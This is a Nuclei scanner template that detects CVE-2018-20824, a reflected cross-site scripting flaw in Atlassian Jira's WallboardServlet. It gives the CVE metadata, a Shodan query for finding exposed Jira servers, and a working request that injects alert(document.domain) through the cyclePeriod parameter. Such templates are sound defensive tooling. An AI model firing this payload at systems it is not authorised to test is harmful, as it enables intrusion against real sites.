nuclei-templates/http/cves/2018/CVE-2018-20824.yaml

43 lines
1.5 KiB
YAML

id: CVE-2018-20824
info:
name: Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting
author: madrobot,dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter.
remediation: |
Upgrade to Atlassian Jira version 7.13.1 or later to mitigate this vulnerability.
reference:
- https://jira.atlassian.com/browse/JRASERVER-69238
- https://nvd.nist.gov/vuln/detail/CVE-2018-20824
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-20824
cwe-id: CWE-79
epss-score: 0.00203
epss-percentile: 0.58114
cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: atlassian
product: jira
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2018,atlassian,jira,xss
http:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- (?mi)timeout:\salert\(document\.domain\)
- type: status
status:
- 200
# digest: 490a0046304402203e7ef26c0418fcc0e5b7014fa2197973a013d54bc2be2af749a3ea455e756ef202206f7be3d331cb18237c77e24bddaae217be8f27beac2d7d2f31367472de0af6f9:922c64590222798bb761d5b6d8e72950